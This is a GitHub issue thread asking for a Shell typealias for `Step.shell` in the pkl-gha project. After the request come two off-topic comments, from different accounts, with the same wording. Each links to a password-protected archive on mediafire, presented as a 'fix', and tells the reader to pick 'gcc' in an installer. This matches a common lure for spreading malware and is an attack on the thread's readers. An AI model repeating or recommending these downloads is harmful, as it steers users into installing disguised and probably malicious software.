### ISSUE TITLE
Support for different shells in `Step.shell`

### ISSUE THREAD

**Issue by StefMa** [StefMa/pkl-gha#9]
Use `typealias Shell = "pwsh" | "bash" | "sh" | "cmd" | "powershell" | "python"`
See https://docs.github.com/en/actions/writing-workflows/workflow-syntax-for-github-actions#jobsjob_idstepsshell

**Comment by FabrizioValenti** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."
